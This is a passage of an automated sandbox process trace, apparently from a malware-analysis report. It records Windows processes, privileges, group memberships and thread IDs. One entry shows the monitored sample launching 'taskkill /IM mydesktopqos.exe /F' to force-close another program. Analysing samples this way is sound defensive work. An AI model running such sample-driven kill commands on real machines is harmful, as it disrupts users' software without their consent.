Thread: id = 77 os_tid = 0xf90 Thread: id = 78 os_tid = 0xfdc Process: id = "30" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7f95000" os_pid = "0xaf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0xfc8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 72 os_tid = 0xfd4 Thread: id = 73 os_tid = 0xda8 Thread: id = 74 os_tid = 0x89c Process: id = "31" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x50e59000" os_pid = "0x3e8" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "29" os_parent_pid = "0x24c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b8a3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 79 os_tid = 0x6cc Thread: id = 80 os_tid = 0x5bc Thread: id = 81 os_tid = 0x54c Thread: id = 82 os_tid = 0xc08 Thread: id = 83 os_tid = 0x738 Thread: id = 84 os_tid = 0x6d0 Thread: id = 85 os_tid = 0xb80 Thread: id = 86 os_tid = 0xd14 Thread: id = 87 os_tid = 0xe24 Thread: id = 88 os_tid = 0xc24 Thread: id = 89 os_tid = 0xabc Thread: id = 90 os_tid = 0x2d8 Thread: id = 91 os_tid = 0x7a8 Thread: id = 92 os_tid = 0xd34 Thread: id = 93 os_tid = 0xd68 Thread: id = 94 os_tid = 0xdd4 Thread: id = 95 os_tid = 0xdc4 Thread: id = 96 os_tid = 0xb88 Thread: id = 97 os_tid = 0xd80 Thread: id = 98 os_tid = 0xd30 Thread: id = 99 os_tid = 0xd94 Thread: id = 100 os_tid = 0xd84 Thread: id = 101 os_tid = 0x438 Thread: id = 102 os_tid = 0x494 Thread: id = 103 os_tid = 0x490 Thread: id = 104 os_tid = 0x49c Thread: id = 105 os_tid = 0xf8c Thread: id = 106 os_tid = 0xf88 Thread: id = 107 os_tid = 0xf84 Thread: id = 108 os_tid = 0xf80 Thread: id = 109 os_tid = 0xf70 Thread: id = 110 os_tid = 0xf78 Thread: id = 111 os_tid = 0xf74 Thread: id = 112 os_tid = 0xf5c Thread: id = 113 os_tid = 0xf54 Thread: id = 114 os_tid = 0xb68 Thread: id = 115 os_tid = 0xab8 Thread: id = 116 os_tid = 0xab4 Thread: id = 117 os_tid = 0xa9c Thread: id = 118 os_tid = 0xa98 Thread: id = 119 os_tid = 0xa94 Thread: id = 120 os_tid = 0xa7c Thread: id = 121 os_tid = 0xa08 Thread: id = 122 os_tid = 0x9fc Thread: id = 123 os_tid = 0x9f4 Thread: id = 124 os_tid = 0x9d4 Thread: id = 125 os_tid = 0x9cc Thread: id = 126 os_tid = 0x9c4 Thread: id = 127 os_tid = 0x99c Thread: id = 128 os_tid = 0x990 Thread: id = 129 os_tid = 0x980 Thread: id = 130 os_tid = 0x978 Thread: id = 131 os_tid = 0x970 Thread: id = 132 os_tid = 0x92c Thread: id = 133 os_tid = 0x8dc Thread: id = 134 os_tid = 0x8b0 Thread: id = 135 os_tid = 0x4c8 Thread: id = 136 os_tid = 0x7e0 Thread: id = 137 os_tid = 0x7dc Thread: id = 138 os_tid = 0x7d8 Thread: id = 139 os_tid = 0x7cc Thread: id = 140 os_tid = 0x79c Thread: id = 141 os_tid = 0x798 Thread: id = 142 os_tid = 0x794 Thread: id = 143 os_tid = 0x708 Thread: id = 144 os_tid = 0x700 Thread: id = 145 os_tid = 0x6f8 Thread: id = 146 os_tid = 0x6f4 Thread: id = 147 os_tid = 0x6f0 Thread: id = 148 os_tid = 0x6ec Thread: id = 149 os_tid = 0x6d8 Thread: id = 150 os_tid = 0x6b0 Thread: id = 151 os_tid = 0x680 Thread: id = 152 os_tid = 0x630 Thread: id = 153 os_tid = 0x600 Thread: id = 154 os_tid = 0x58c Thread: id = 155 os_tid = 0x584 Thread: id = 156 os_tid = 0x560 Thread: id = 157 os_tid = 0x528 Thread: id = 158 os_tid = 0x520 Thread: id = 159 os_tid = 0x518 Thread: id = 160 os_tid = 0x424 Thread: id = 161 os_tid = 0x418 Thread: id = 162 os_tid = 0x408 Thread: id = 163 os_tid = 0x404 Thread: id = 164 os_tid = 0x2a8 Thread: id = 165 os_tid = 0x180 Thread: id = 166 os_tid = 0x190 Thread: id = 167 os_tid = 0x348 Thread: id = 168 os_tid = 0x34c Thread: id = 169 os_tid = 0x32c Thread: id = 170 os_tid = 0x304 Thread: id = 171 os_tid = 0x244 Thread: id = 172 os_tid = 0x2a4 Thread: id = 173 os_tid = 0x2b8 Thread: id = 174 os_tid = 0x3ec Thread: id = 175 os_tid = 0x608 Thread: id = 176 os_tid = 0xb78 Thread: id = 177 os_tid = 0x18c Thread: id = 178 os_tid = 0x390 Thread: id = 179 os_tid = 0xc04 Thread: id = 180 os_tid = 0x650 Thread: id = 181 os_tid = 0x5f4 Thread: id = 187 os_tid = 0x11b4 Process: id = "32" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x7fa5000" os_pid = "0x8d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xde0" cmd_line = "\"taskkill.exe\" /IM mydesktopqos.exe /F" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 182 os_tid = 0x488 Thread: id = 186 os_tid = 0x8e4 Process: id = "33" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x586b000" os_pid = "0x5f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x8d8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 183 os_tid = 0xfb0 Thread: id = 184 os_tid = 0xffc Thread: id = 185 os_tid = 0x160